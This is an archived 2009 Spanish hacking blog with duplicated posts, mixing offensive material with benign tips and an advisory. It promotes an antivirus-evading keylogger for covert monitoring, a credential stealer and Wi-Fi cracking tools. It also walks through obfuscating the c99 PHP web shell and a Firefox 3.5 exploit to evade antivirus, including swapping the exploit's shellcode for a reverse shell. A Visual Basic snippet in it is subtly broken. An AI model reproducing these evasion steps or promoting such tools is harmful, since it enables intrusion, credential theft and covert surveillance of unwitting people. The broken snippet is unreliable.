Backup Oficial de SeguridadBlanca.Org

viernes, 31 de julio de 2009

Tool: Scanner by Stalker

Tool que encuentra tablas sql en PHP y ASP muy buena la recomiendo ya la estube probando ayer...


Descarga: Dark Code

fuente: Dark Code

Saludos
Dr.White

Tool: Scanner by Stalker

Tool que encuentra tablas sql en PHP y ASP muy buena la recomiendo ya la estube probando ayer...


Descarga: Dark Code

fuente: Dark Code

Saludos
Dr.White

Pen-Test: Epson Status Monitor 3 [LPE]



Basados en http://www.milw0rm.com/exploits/9199 los del grupo hacker Nine:Situations:Group ha encontrado unanueva vulnerabilidad de escalación de privilegios locales nada mas y nada menos que en el sitema de impresiones de epson "epson status monitor 3" no hay muha ciencia en el exploit y no es demaciado crítico pero mas vale prevenir que lamentar porque si combinamos ese tipo de bugs con algunos errores de configuración por otros lugares tendriamos serios problemas, podemos usar algun rootkit que querramos para ayudarnos, espero les sirva.

El bug de epson en milw0rm:
http://milw0rm.com/exploits/9305


Saludos
Dr.White

Pen-Test: Epson Status Monitor 3 [LPE]



Basados en http://www.milw0rm.com/exploits/9199 los del grupo hacker Nine:Situations:Group ha encontrado unanueva vulnerabilidad de escalación de privilegios locales nada mas y nada menos que en el sitema de impresiones de epson "epson status monitor 3" no hay muha ciencia en el exploit y no es demaciado crítico pero mas vale prevenir que lamentar porque si combinamos ese tipo de bugs con algunos errores de configuración por otros lugares tendriamos serios problemas, podemos usar algun rootkit que querramos para ayudarnos, espero les sirva.

El bug de epson en milw0rm:
http://milw0rm.com/exploits/9305


Saludos
Dr.White

Tutorial Asm orientado a GNU/LINUX

Este manual lo he comensado a leer hace algunos dias entonces lo quería compartir con ustedes, espero les guste...



guardenlo y leanlo todo está muy bueno 100% recomendado.



Saludos
Dr.White

Tutorial Asm orientado a GNU/LINUX

Este manual lo he comensado a leer hace algunos dias entonces lo quería compartir con ustedes, espero les guste...



guardenlo y leanlo todo está muy bueno 100% recomendado.



Saludos
Dr.White

Programación: Un poco de Visual Basic 6.0

vamos a hacer un programita que te ponga letras en mayusculas o en minusculas segun lo que querramos, agregamos un command, un checkbox y un textbox:

en primer lugar declaramos las variables:

Dim a As String, b As String

luego muy facil

preguntamos si el checkbox está activado:

If Check1.Value = 1 Then

si eso es verdadero vamos a convertir todo en mayusculas

b = LCase(Text1.Text)

y lo mostramos

MsgBox b

de lo contrario

Else

es decir si el checkbox no está seleccionado

a = UCase(Text1.Text)

mostramos

MsgBox a

Consluye:

End If



Ahora el codigo completo será algo como:

Dim a As String, b As String

If Check1.Value = 1 Then
b = LCase(Text1.Text)
MsgBox x
Else
a = UCase(Text1.Text)
MsgBox a
End If



Ahora ya ustedes pueden agregar variantes con radio buttons o incluso poniendole un input segun su conocimiento.


Saludos
Dr.White

Programación: Un poco de Visual Basic 6.0

vamos a hacer un programita que te ponga letras en mayusculas o en minusculas segun lo que querramos, agregamos un command, un checkbox y un textbox:

en primer lugar declaramos las variables:

Dim a As String, b As String

luego muy facil

preguntamos si el checkbox está activado:

If Check1.Value = 1 Then

si eso es verdadero vamos a convertir todo en mayusculas

b = LCase(Text1.Text)

y lo mostramos

MsgBox b

de lo contrario

Else

es decir si el checkbox no está seleccionado

a = UCase(Text1.Text)

mostramos

MsgBox a

Consluye:

End If



Ahora el codigo completo será algo como:

Dim a As String, b As String

If Check1.Value = 1 Then
b = LCase(Text1.Text)
MsgBox x
Else
a = UCase(Text1.Text)
MsgBox a
End If



Ahora ya ustedes pueden agregar variantes con radio buttons o incluso poniendole un input segun su conocimiento.


Saludos
Dr.White

Tool: IpGet


Con esta tool podemos sacar la ip de una persona mediante una conversación de messenger y tambien un poco de Ingenieria Social, su uso es muy fácil y muy útil, espero les sirva este programa.


Se necesita tener el MSN PLUS y bueno sirve con windows XP y anteriores o almenos esas se que funcionan sin ningun problema.


Download IP Get:




Saludos
Dr.White

Tool: IpGet


Con esta tool podemos sacar la ip de una persona mediante una conversación de messenger y tambien un poco de Ingenieria Social, su uso es muy fácil y muy útil, espero les sirva este programa.


Se necesita tener el MSN PLUS y bueno sirve con windows XP y anteriores o almenos esas se que funcionan sin ningun problema.


Download IP Get:




Saludos
Dr.White

jueves, 30 de julio de 2009

Voten por nosotros

Dando click aquí nos están ayudando para subir nuestro ranking en cinco-links espero que nos ayuden con un click diario.


Saludos
Dr.white

Voten por nosotros

Dando click aquí nos están ayudando para subir nuestro ranking en cinco-links espero que nos ayuden con un click diario.


Saludos
Dr.white

Quitando recursos innecesarios

No les ha pasado que inician windows y tienen muchisimos procesos y servicios en segundo plano haciendo tonterias y lo que mas hacen es consumir su memoria... les voy a enseñar a hacer que estos procesos tan molestos se vayan.


1.- Inicio>>Ejecutar ---- services.msc

2.- luego en la ventana damos click derecho sobre el servicio que deseamos deshabilitar.

3.- Escogemos propiedades.

4.- En tipo de inicio ponemos Deshabilitado.


Ahora ya habrán puesto mas rapida su maquina y su memoria se los agradecerá.


Saludos
Dr.White

Quitando recursos innecesarios

No les ha pasado que inician windows y tienen muchisimos procesos y servicios en segundo plano haciendo tonterias y lo que mas hacen es consumir su memoria... les voy a enseñar a hacer que estos procesos tan molestos se vayan.


1.- Inicio>>Ejecutar ---- services.msc

2.- luego en la ventana damos click derecho sobre el servicio que deseamos deshabilitar.

3.- Escogemos propiedades.

4.- En tipo de inicio ponemos Deshabilitado.


Ahora ya habrán puesto mas rapida su maquina y su memoria se los agradecerá.


Saludos
Dr.White

Grave vulnerabilidad en Blind 9 con exploits públicos


¿Tienes un servidor DNS Bind 9 instalado en alguna de tus máquinas que administras, que no corresponde ni con la versión 9.4.3-P3, 9.5.1-P3 ni la 9.6.1-P1? Pues deja todo lo que estés haciendo.

El 28 de Julio podíamos leer en la página del ISC un advisory sobre una vulnerabilidad que afectaba al servidor Bind, versión 9, con la que se puede provocar una denegación de servicio al sistema dónde se encuentre instalado (que no son pocos en todo el mundo).

La vulnerabilidad afecta a la función dns_db_findrdataset() que se encuentra en el fichero db.c, y que según explica el advisory, falla en caso de que el mensaje de actualización dinámica contenga un registro de tipo "ANY" y si por lo menos un registro RRSet para ese FQDN (Fully Qualified Domain Name) existe ya en el servidor."

Lo más grave de todo es que ya existen exploits públicos que se aprovechan de esta vulnerabilidad. En SecurityFocus podemos encontrarnos este txt que explica como explotar el fallo, y en la lista de seguridad Full-Disclosure, KingCope (el que descubrió no hace mucho el fallo de bypass en WebDav del que os hablamos por aquí) ha publicado una versión del exploit en C.

Así que no hay excusa, hay que actualizar YA de YA.


Fuente



Saludos
Dr.White

Grave vulnerabilidad en Blind 9 con exploits públicos


¿Tienes un servidor DNS Bind 9 instalado en alguna de tus máquinas que administras, que no corresponde ni con la versión 9.4.3-P3, 9.5.1-P3 ni la 9.6.1-P1? Pues deja todo lo que estés haciendo.

El 28 de Julio podíamos leer en la página del ISC un advisory sobre una vulnerabilidad que afectaba al servidor Bind, versión 9, con la que se puede provocar una denegación de servicio al sistema dónde se encuentre instalado (que no son pocos en todo el mundo).

La vulnerabilidad afecta a la función dns_db_findrdataset() que se encuentra en el fichero db.c, y que según explica el advisory, falla en caso de que el mensaje de actualización dinámica contenga un registro de tipo "ANY" y si por lo menos un registro RRSet para ese FQDN (Fully Qualified Domain Name) existe ya en el servidor."

Lo más grave de todo es que ya existen exploits públicos que se aprovechan de esta vulnerabilidad. En SecurityFocus podemos encontrarnos este txt que explica como explotar el fallo, y en la lista de seguridad Full-Disclosure, KingCope (el que descubrió no hace mucho el fallo de bypass en WebDav del que os hablamos por aquí) ha publicado una versión del exploit en C.

Así que no hay excusa, hay que actualizar YA de YA.


Fuente



Saludos
Dr.White

miércoles, 29 de julio de 2009

Feliz cumple años Dr.White

Bueno el dia de hoy cumplo 16 años, espero que aunque sea me comenten en esta entrada con un Feliz Cumple, hoy no haré ninguna entrada lo siento pero es mi dia de descanso, espero que aun asi lean los otros articulos del blog, mi mejor regalo será que hoy mas que nunca visiten el blog.


Muchas Gracias


Saludos
Dr.White


PD: mañana se harán entradas normalmente.

Feliz cumple años Dr.White

Bueno el dia de hoy cumplo 16 años, espero que aunque sea me comenten en esta entrada con un Feliz Cumple, hoy no haré ninguna entrada lo siento pero es mi dia de descanso, espero que aun asi lean los otros articulos del blog, mi mejor regalo será que hoy mas que nunca visiten el blog.


Muchas Gracias


Saludos
Dr.White


PD: mañana se harán entradas normalmente.

martes, 28 de julio de 2009

Bypasseando Super Simple y Útil

ahora les voy a dar pequeños ejemplos de como bypassear algunos tipos de bloqueos que se nos hacen en siertas webs;

El famoso Registrate para ver imagenes y/o Links en foros SMF...

Ejemplo:

En el siguiente post no podemos ver ninguna Imagen por que son bloqueadas.

http://xtremfiles.com/index.php?topic=28.msg83#new

Entonces lo que haríamos sería añadir lo siguiente:

"action=printpage"

en ves de topic= y poner el topic completo que nos dará como resultado:


O simplemente lo pueden conseguir dando click en el Boton de Imprimir.

[Recalco no se puede en todos los casos]

##################################################

Ahora otro tipo de bypass muy fácil es el típico puedes poner solo 10 caracteres en
tu nombre, esto es muy molesto para los que su nombre tiene 11 letras entonces abrimos
la página del registro con Mozilla Firefox y nos descargamos el Addon Firebug y ahora la tarea es fácil, reiniciamos el Firefox y en nuestra esquina inferior derecha veremos un pequeño insecto le damos click y vamos a la pestaña que dice Html desde ahi podremos editar el html y ahora en el body de la web tenemos que buscar una linea como:

  • usuario:
  • /br
  • input type="text" name="user" maxlength="10"


entonces ahi nosotros con el firebug le daremos click al "10" y lo cambiaremos por el número que querramos y podremos usar felices nuestros nicks.

[Recalco no se puede en todos los casos]

#################################################################

Las típicas descargar que hay que registrarnos en sistemas como Vbulletin... bueno no se si habran visto que les aparecen unas imagenes como de archivos comprimidos y que cuando ves el codigo no salen a donde vas y es muy pesado registrarse pues a veces pasa entonces nosotros cuando damos click al link nos sale algo como esto:

http://vbulletintests.com/login.php?url=http://descargasregistrandote.com/downloads/archivo.rar

pero si el momento de chequear eso no estamos registrados pues nos mandará a http://vbulletintests.com/register.php entonces nosotros vamos a ser mas vivos en el momento que demos click a la imagen de descarga o algo ponemos la X de detener la navegación en nuestro explorador y copiamos tranquilamente la url del archivo .rar o .zip o .tar o lo que quieran.

[Recalco no se puede en todos los casos]

#################################################

Viendo Videos de Megavideo por mas de 70 minutos digamos que tu pelicula dura 80 minutos y te quieres ver toda la pelicula y lamentablemente otro dia ya no podras por que la sacan del internet :S [puede pasar] entonces dices me la veo o me la veo y bueno sin ver la película vamos a a dejar cargando el video al final y cuando llegue al final vamos a poner trabajar sin conexión o para asegurarnos pues apagamos nuestro router y ya.


No hay mucha ciencia solo imaginación ;)



Saludos
Dr.White

Bypasseando Super Simple y Útil

ahora les voy a dar pequeños ejemplos de como bypassear algunos tipos de bloqueos que se nos hacen en siertas webs;

El famoso Registrate para ver imagenes y/o Links en foros SMF...

Ejemplo:

En el siguiente post no podemos ver ninguna Imagen por que son bloqueadas.

http://xtremfiles.com/index.php?topic=28.msg83#new

Entonces lo que haríamos sería añadir lo siguiente:

"action=printpage"

en ves de topic= y poner el topic completo que nos dará como resultado:


O simplemente lo pueden conseguir dando click en el Boton de Imprimir.

[Recalco no se puede en todos los casos]

##################################################

Ahora otro tipo de bypass muy fácil es el típico puedes poner solo 10 caracteres en
tu nombre, esto es muy molesto para los que su nombre tiene 11 letras entonces abrimos
la página del registro con Mozilla Firefox y nos descargamos el Addon Firebug y ahora la tarea es fácil, reiniciamos el Firefox y en nuestra esquina inferior derecha veremos un pequeño insecto le damos click y vamos a la pestaña que dice Html desde ahi podremos editar el html y ahora en el body de la web tenemos que buscar una linea como:

  • usuario:
  • /br
  • input type="text" name="user" maxlength="10"


entonces ahi nosotros con el firebug le daremos click al "10" y lo cambiaremos por el número que querramos y podremos usar felices nuestros nicks.

[Recalco no se puede en todos los casos]

#################################################################

Las típicas descargar que hay que registrarnos en sistemas como Vbulletin... bueno no se si habran visto que les aparecen unas imagenes como de archivos comprimidos y que cuando ves el codigo no salen a donde vas y es muy pesado registrarse pues a veces pasa entonces nosotros cuando damos click al link nos sale algo como esto:

http://vbulletintests.com/login.php?url=http://descargasregistrandote.com/downloads/archivo.rar

pero si el momento de chequear eso no estamos registrados pues nos mandará a http://vbulletintests.com/register.php entonces nosotros vamos a ser mas vivos en el momento que demos click a la imagen de descarga o algo ponemos la X de detener la navegación en nuestro explorador y copiamos tranquilamente la url del archivo .rar o .zip o .tar o lo que quieran.

[Recalco no se puede en todos los casos]

#################################################

Viendo Videos de Megavideo por mas de 70 minutos digamos que tu pelicula dura 80 minutos y te quieres ver toda la pelicula y lamentablemente otro dia ya no podras por que la sacan del internet :S [puede pasar] entonces dices me la veo o me la veo y bueno sin ver la película vamos a a dejar cargando el video al final y cuando llegue al final vamos a poner trabajar sin conexión o para asegurarnos pues apagamos nuestro router y ya.


No hay mucha ciencia solo imaginación ;)



Saludos
Dr.White

Remodelamos el Blog

Es cansado siempre llevar el mismo diseño entonces decidí cambiarle los colores al blog, espero les guste asi como está ahora, por el momento se quedará asi como lo hemos puesto ahora, si no les gusta pues hagan saberlo mediante comentarios y nosotros los regresaremos a como estaba.

gracias.


Saludos
Dr.White

Remodelamos el Blog

Es cansado siempre llevar el mismo diseño entonces decidí cambiarle los colores al blog, espero les guste asi como está ahora, por el momento se quedará asi como lo hemos puesto ahora, si no les gusta pues hagan saberlo mediante comentarios y nosotros los regresaremos a como estaba.

gracias.


Saludos
Dr.White

¿Internautas de Hoy, Guerreros del Mañana?


Como siempre andube leyendo muchisimo para aprender mas sobre Seguridad en moviles pero navegando por ahi llegue a una entrada de el-hacker.com.ar que decía que los de Estados Unidos estaban buscando Cyber Ninjas y Cyber Warriors, Esto indica que quieren gente que contra ataque pero... ¿contra que?, se rumora que la siguiente guerra mundial será por el agua pero no lo creo así, el internet lo está volviendo todo mas rápido y mas fácil, todo se está comensando a manejar con redes y todo se está moviendo a través de internet, cosas como Dinero, Encomiendas, Dinero, Productos, Dinero, Comidas y Más Dinero, el dinero cada ves se está llevando en mucha mas cantidad a través de la internet pero... ¿quien lo protege? pues la mayoría de veces confían en supuestos expertos en seguridad que solo llevan un cartón con su nombre que dice que son certificados en la carrera de Seguridad en Sistemas o Seguridad Informática, pero hay gente como nosotros, ustedes y mucha mas gente que sin los estudios de una universidad pueden profanar esos sistemas, no por que sean genios sino por que tienen la práctica, su dia a dia es proteger un sistema, un Black Hat todo el dia trata de vulnerar servidores, de encontrar nuevas vulnerabilidades, el dia a dia de un White Hat es proteger un sistema de que nadie pueda entrar, toda la vida ha sido así no siempre se trata de tener estudios o de tener un rango, la universidad no hace al alumno. Ya existen muchos robos por internet y se han intentado parar con certificados o con programas, pero no siempre se podrán asegurar, no solo lo digo por el dinero en si hay sistemas militares los cuales son vulnerados en su dia a dia, nosotros debemos dar a entender a los Lugares"Mas seguros del mundo en informática" que no existe ningun sitio que sea perfecto y es mejor prevenir que lamentar, los que navegamos tranquilamente hoy, mañan tendremos que ponernos pilas para que nuestra información y datos esten seguros en internet, solo reflexionenlo, ya se clonan identidades en Redes Sociales.


Haré la continuación de este articulo pronto.


Saludos
Dr.White

¿Internautas de Hoy, Guerreros del Mañana?


Como siempre andube leyendo muchisimo para aprender mas sobre Seguridad en moviles pero navegando por ahi llegue a una entrada de el-hacker.com.ar que decía que los de Estados Unidos estaban buscando Cyber Ninjas y Cyber Warriors, Esto indica que quieren gente que contra ataque pero... ¿contra que?, se rumora que la siguiente guerra mundial será por el agua pero no lo creo así, el internet lo está volviendo todo mas rápido y mas fácil, todo se está comensando a manejar con redes y todo se está moviendo a través de internet, cosas como Dinero, Encomiendas, Dinero, Productos, Dinero, Comidas y Más Dinero, el dinero cada ves se está llevando en mucha mas cantidad a través de la internet pero... ¿quien lo protege? pues la mayoría de veces confían en supuestos expertos en seguridad que solo llevan un cartón con su nombre que dice que son certificados en la carrera de Seguridad en Sistemas o Seguridad Informática, pero hay gente como nosotros, ustedes y mucha mas gente que sin los estudios de una universidad pueden profanar esos sistemas, no por que sean genios sino por que tienen la práctica, su dia a dia es proteger un sistema, un Black Hat todo el dia trata de vulnerar servidores, de encontrar nuevas vulnerabilidades, el dia a dia de un White Hat es proteger un sistema de que nadie pueda entrar, toda la vida ha sido así no siempre se trata de tener estudios o de tener un rango, la universidad no hace al alumno. Ya existen muchos robos por internet y se han intentado parar con certificados o con programas, pero no siempre se podrán asegurar, no solo lo digo por el dinero en si hay sistemas militares los cuales son vulnerados en su dia a dia, nosotros debemos dar a entender a los Lugares"Mas seguros del mundo en informática" que no existe ningun sitio que sea perfecto y es mejor prevenir que lamentar, los que navegamos tranquilamente hoy, mañan tendremos que ponernos pilas para que nuestra información y datos esten seguros en internet, solo reflexionenlo, ya se clonan identidades en Redes Sociales.


Haré la continuación de este articulo pronto.


Saludos
Dr.White

Pro-Hide Logger V2.4


Es un Programa de Tipo Keylogger con el cual es posible ver todas las teclas digitadas por el Servidor, este programa fue diseñado para control parental, no es detectado por ningun Antivirus y si asi fuese se les da copias para la no detección del mismo, garantizo que es un programa de muy buena calidad, las licencias son baratas y el programa es muy útil en el caso que quieran tener un poco mas monitoreados a sus hij@s o a la gente de su empresa. Con este programa usted podrá ver lo que escriben pero ellos no sabrán que usted los está observando.


Descripcion del Autor:

Con el programa (de tipo Keylogger), usted podrá registrar todas las teclas que han sido pulsadas en el ordenador (chats, claves, páginas visitadas, documentos, actividad local, incluyendo el portapapeles); con su respectiva fecha y título de ventana en que fueron registradas.
(*)El Programa no es detectado por los antivirus, y si asi fuera, estamos dando otra copia que siga siendo indetectable.



Para Adquirir este programa deben de ingresar a la siguiente web:



Espero este software sea de su agrado.


Aquí les dejo una IMG de como sería el historial para que tengan una idea:



Saludos
Dr.White

Pro-Hide Logger V2.4


Es un Programa de Tipo Keylogger con el cual es posible ver todas las teclas digitadas por el Servidor, este programa fue diseñado para control parental, no es detectado por ningun Antivirus y si asi fuese se les da copias para la no detección del mismo, garantizo que es un programa de muy buena calidad, las licencias son baratas y el programa es muy útil en el caso que quieran tener un poco mas monitoreados a sus hij@s o a la gente de su empresa. Con este programa usted podrá ver lo que escriben pero ellos no sabrán que usted los está observando.


Descripcion del Autor:

Con el programa (de tipo Keylogger), usted podrá registrar todas las teclas que han sido pulsadas en el ordenador (chats, claves, páginas visitadas, documentos, actividad local, incluyendo el portapapeles); con su respectiva fecha y título de ventana en que fueron registradas.
(*)El Programa no es detectado por los antivirus, y si asi fuera, estamos dando otra copia que siga siendo indetectable.



Para Adquirir este programa deben de ingresar a la siguiente web:



Espero este software sea de su agrado.


Aquí les dejo una IMG de como sería el historial para que tengan una idea:



Saludos
Dr.White

lunes, 27 de julio de 2009

Consejos de Seguridad para el I-Phone

En uno de los portales wiki del iPhone Dev-Team podremos encontrar un post muy curioso con 10 trucos para usuarios del teléfono móvil de Apple, el iPhone, en caso de que vayan a la Defcon 17 que tendrá lugar dentro de unos días en Las Vegas.

Entre estos trucos, nos recopilan consejos dedicados a mantener la seguridad de este dispositivo al meternos en un nido de hackers como es dicho congreso de seguridad.

Este miedo pudimos vivirlo cuando asistimos a la BlackHat EU de este año en Amsterdam, con tanto portátil enchufado, tantos intentos registrados en los firewalls...seguramente había más nmaps corriendo contra los asistentes que croissants para desayunar.
  • Deshabilitar todas las cookies de autenticación en Safari. Todos utilizan la wifi gratuita que ofrece el hotel, y debido al perfil de la gente que asistirá a tal evento, y que seguramente durante muchas de las charlas que tendrán lugar, habrá algún individuo que se dedique a sniffar en vez de permanecer atento, es recomendable no visitar sitios web mediante HTTP cuando requieran autenticación. Se debe forzar la autenticación, y la navegación en algunos casos, en twitter, gmail, google reader, facebook o dónde sea, siempre mediante HTTPS.
  • En caso de poder utilizar una conexión 3G, evitar en la medida de lo posible conectarse mediante las conexiones WIFI de las instalaciones o del propio aeropuerto antes o después de llegar a Las Vegas.
  • Configurar el iPhone para que no se conecte automáticamente a redes wifi conocidas.
  • Utilizar tethering para evitar conectarse mediante wifi también con los portátiles. En caso de poder evitar utilizar la wifi, considerar la opción de utilizar la aplicación Unrestrictor 3G. Esta aplicación evita que multitud de herramientas, como iTunes o Skype, fuercen la conexión mediante wifi en caso de encontrar una red disponible. Cuesta 2$ y se puede comprar a través del respositorio de BigBoss tanto en Icy como en Cydia.
  • Cambiar la contraseña de root y de mobile del iPhone, o desactivar directamente el servidor SSH. Por defecto en los firmwares, la contraseña ha sido "alpine", y siempre se ha utilizado para las conexiones SSH contra los dispositivos. al tener que editar algún fichero de configuración manualmente al tenerlo jailbreakeado y demás. En caso de no querer cambiarla, por lo menos, dejar desactivado el servidor SSH mediante el SBSettings.
Así que ya sabeis: Si pronto vais a asistir a un congreso de seguridad, lo importante es que sólo os preocupeis de a qué charlas asistir y disfrutar de su contenido cuando llegue el momento. Pero antes de marchar al aeropuerto armados con vuestros productos hacker preferidos, tened en cuenta estos pequeños consejos.

Fuente: Securitybydefault


Saludos
Dr.White

Consejos de Seguridad para el I-Phone

En uno de los portales wiki del iPhone Dev-Team podremos encontrar un post muy curioso con 10 trucos para usuarios del teléfono móvil de Apple, el iPhone, en caso de que vayan a la Defcon 17 que tendrá lugar dentro de unos días en Las Vegas.

Entre estos trucos, nos recopilan consejos dedicados a mantener la seguridad de este dispositivo al meternos en un nido de hackers como es dicho congreso de seguridad.

Este miedo pudimos vivirlo cuando asistimos a la BlackHat EU de este año en Amsterdam, con tanto portátil enchufado, tantos intentos registrados en los firewalls...seguramente había más nmaps corriendo contra los asistentes que croissants para desayunar.
  • Deshabilitar todas las cookies de autenticación en Safari. Todos utilizan la wifi gratuita que ofrece el hotel, y debido al perfil de la gente que asistirá a tal evento, y que seguramente durante muchas de las charlas que tendrán lugar, habrá algún individuo que se dedique a sniffar en vez de permanecer atento, es recomendable no visitar sitios web mediante HTTP cuando requieran autenticación. Se debe forzar la autenticación, y la navegación en algunos casos, en twitter, gmail, google reader, facebook o dónde sea, siempre mediante HTTPS.
  • En caso de poder utilizar una conexión 3G, evitar en la medida de lo posible conectarse mediante las conexiones WIFI de las instalaciones o del propio aeropuerto antes o después de llegar a Las Vegas.
  • Configurar el iPhone para que no se conecte automáticamente a redes wifi conocidas.
  • Utilizar tethering para evitar conectarse mediante wifi también con los portátiles. En caso de poder evitar utilizar la wifi, considerar la opción de utilizar la aplicación Unrestrictor 3G. Esta aplicación evita que multitud de herramientas, como iTunes o Skype, fuercen la conexión mediante wifi en caso de encontrar una red disponible. Cuesta 2$ y se puede comprar a través del respositorio de BigBoss tanto en Icy como en Cydia.
  • Cambiar la contraseña de root y de mobile del iPhone, o desactivar directamente el servidor SSH. Por defecto en los firmwares, la contraseña ha sido "alpine", y siempre se ha utilizado para las conexiones SSH contra los dispositivos. al tener que editar algún fichero de configuración manualmente al tenerlo jailbreakeado y demás. En caso de no querer cambiarla, por lo menos, dejar desactivado el servidor SSH mediante el SBSettings.
Así que ya sabeis: Si pronto vais a asistir a un congreso de seguridad, lo importante es que sólo os preocupeis de a qué charlas asistir y disfrutar de su contenido cuando llegue el momento. Pero antes de marchar al aeropuerto armados con vuestros productos hacker preferidos, tened en cuenta estos pequeños consejos.

Fuente: Securitybydefault


Saludos
Dr.White

Obfuscando Shell(PHP)


De nuevo, vamos a poder comprobar que los antivirus no son capaces de hacer mucho más que comparar con firmas (hashes). Cualquier mínimo nivel de ofuscación se los salta.

En esta "práctica", lo que haremos es subir a virustotal, un conocido servicio de antivirus online, la shell c99.txt, que podría decirse es la más típica shell en php. La subiremos, analizaremos, ofuscaremos y volveremos a subir y analizar. Y el resultado es ... el que todos esperamos. Los siguientes pantallazos ilustran el experimento.

En primer lugar, subimos la shell a virustotal. Por supuesto, casi todos los antivirus la detectan.



Una vez comprobado esto, copiamos el código de la shell y la subimos a codeeclipse, que tiene un servicio online de ofuscación de código php. El proceso es muy sencillo, tal y como vemos a continuación:







Finalmente, subimos la shell ofuscada a virustotal, y ...



Seguramente, cambiando los nombres de las funciones que se llaman c99xxx tendríamos que nuestra shell es totalmente indetectable para los antivirus. De hecho, además de con c99, he probado con otra shell menos conocida y virustotal no la ha detectado tras ofuscarla.

Me gustaría decir que el resultado me ha sorprendido pero, para ser sinceros, me parece que es la confirmación de un hecho por todos conocido.

Fuente

Saludos
Dr.White

Obfuscando Shell(PHP)


De nuevo, vamos a poder comprobar que los antivirus no son capaces de hacer mucho más que comparar con firmas (hashes). Cualquier mínimo nivel de ofuscación se los salta.

En esta "práctica", lo que haremos es subir a virustotal, un conocido servicio de antivirus online, la shell c99.txt, que podría decirse es la más típica shell en php. La subiremos, analizaremos, ofuscaremos y volveremos a subir y analizar. Y el resultado es ... el que todos esperamos. Los siguientes pantallazos ilustran el experimento.

En primer lugar, subimos la shell a virustotal. Por supuesto, casi todos los antivirus la detectan.



Una vez comprobado esto, copiamos el código de la shell y la subimos a codeeclipse, que tiene un servicio online de ofuscación de código php. El proceso es muy sencillo, tal y como vemos a continuación:







Finalmente, subimos la shell ofuscada a virustotal, y ...



Seguramente, cambiando los nombres de las funciones que se llaman c99xxx tendríamos que nuestra shell es totalmente indetectable para los antivirus. De hecho, además de con c99, he probado con otra shell menos conocida y virustotal no la ha detectado tras ofuscarla.

Me gustaría decir que el resultado me ha sorprendido pero, para ser sinceros, me parece que es la confirmación de un hecho por todos conocido.

Fuente

Saludos
Dr.White

domingo, 26 de julio de 2009

t00l: Wirless Hack

Esta es la colección de programas para crackear redes Wi-Fi y/o Wireless; espero les agraden...


Algunas:

  • Airopeek
  • Airsnarf 0.2
  • Cqureap
  • WepAttack 0.1.3



Descarga:

Lo Recomiendo en especial por que pueden editar los funcionamientos de algunos Programas...


Saludos
Dr.white

t00l: Wirless Hack

Esta es la colección de programas para crackear redes Wi-Fi y/o Wireless; espero les agraden...


Algunas:

  • Airopeek
  • Airsnarf 0.2
  • Cqureap
  • WepAttack 0.1.3



Descarga:

Lo Recomiendo en especial por que pueden editar los funcionamientos de algunos Programas...


Saludos
Dr.white

T00l: Password Stealer

Este es un programita útil en algunas ocaciones, lo que hace es robar las contraseñas del MSN, IE6 y IE7, Espero les agrade y usenla con Juicio.

Descarga:


Saludos
Dr.White

T00l: Password Stealer

Este es un programita útil en algunas ocaciones, lo que hace es robar las contraseñas del MSN, IE6 y IE7, Espero les agrade y usenla con Juicio.

Descarga:


Saludos
Dr.White

sábado, 25 de julio de 2009

Ultra Hackers Tool Pack

Este Paquete de Tools hackers son un pocos viejos pero se que les va a servir para los que recien están empesando, se que la mayoría los conocera por que fueron muy buenos en su tiempo pero ahora son un poco arcaícos, espero les sirva. y porfavor no olviden subscribirse para ser lectores de nuestro blog. y comentar en nuestros TEMAS.


Link de Descarga:



Pass:

www.Gold4run.net

Saludos
Dr.White

Ultra Hackers Tool Pack

Este Paquete de Tools hackers son un pocos viejos pero se que les va a servir para los que recien están empesando, se que la mayoría los conocera por que fueron muy buenos en su tiempo pero ahora son un poco arcaícos, espero les sirva. y porfavor no olviden subscribirse para ser lectores de nuestro blog. y comentar en nuestros TEMAS.


Link de Descarga:



Pass:

www.Gold4run.net

Saludos
Dr.White

Obfuscation Para Exploit

con este tuto podrán ver como obfuscar un exploit para que el AntiVirus no lo detecte.


Aprovechando que hace poco salió un exploit para firefox 3.5, vamos a explicar cómo modificarlo para que no lo detecte el antivirus. Es muy sencillo: tan sólo requiere tocar el código html a mano, para quitar los strings que identifican al exploit, y usar un ofuscador online de código javascript.

Para probar este exploit, vamos a necesitar la versión 3.5 del firefox, que puede bajarse de aquí. Además, necesitamos privilegios de admin, porque si no el exploit falla. Esto no lo pone en el report de milw0rm, pero se ve cuando se prueba.

PASO 1: quitar los strings que identifican al exploit.

Si nos fijamos, el exploit contiene los siguientes strings. Todos ellos hay que quitarlos, ya que algún antivirus puede haberlos usado para identificarlo (pese a lo que digan, las heurísticas no se usan demasiado):

Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerabilty
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload


Y, por supuesto, todas las referencias a milw0rm.com hay que quitarlas también (hay una al final del todo).

PASO 2: ofuscar el código javascript.

Antes de nada, vamos a comprobar que, realmente, nuestro antivirus detecta el exploit. Bajamos el código de milw0rm, lo guardamos como exploit.html y lo intentamos abrir ...



Lo que haremos será ofuscar el código javascript con una herramienta online, una cualquiera, y guardar de nuevo exploit.html. Para ofuscarlo, he elegido ésta herramienta, pero basicamente cualquiera servirá.



Una vez ofuscado:



Y ahora repetimos el proceso: guardamos el código como exploit.html, sustituyendo el javascript por el OFUSCADO y quitando los strings que hacen referencia a que esto es un exploit, lo ejecutamos ... ¡¡y no nos detecta el antivirus!!



El paso final, sería substituir el shellcode de calc.exe por el de una shell inversa, por ejemplo:

char code[] =
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
[...]


Esta shell puede bajarse de metasploit. Una vez bajada la shell, la pegamos en el exploit original substituyendo a la de calc.exe y ofuscamos todo el javascript con la herramienta online.

Como habéis visto, es relativamente sencillo ofuscar un exploit en un lenguaje complejo, como pueda ser javascript, para que el antivirus no lo detecte.

Fuente: Hacking-Avanzado

Saludos
Dr.White

Obfuscation Para Exploit

con este tuto podrán ver como obfuscar un exploit para que el AntiVirus no lo detecte.


Aprovechando que hace poco salió un exploit para firefox 3.5, vamos a explicar cómo modificarlo para que no lo detecte el antivirus. Es muy sencillo: tan sólo requiere tocar el código html a mano, para quitar los strings que identifican al exploit, y usar un ofuscador online de código javascript.

Para probar este exploit, vamos a necesitar la versión 3.5 del firefox, que puede bajarse de aquí. Además, necesitamos privilegios de admin, porque si no el exploit falla. Esto no lo pone en el report de milw0rm, pero se ve cuando se prueba.

PASO 1: quitar los strings que identifican al exploit.

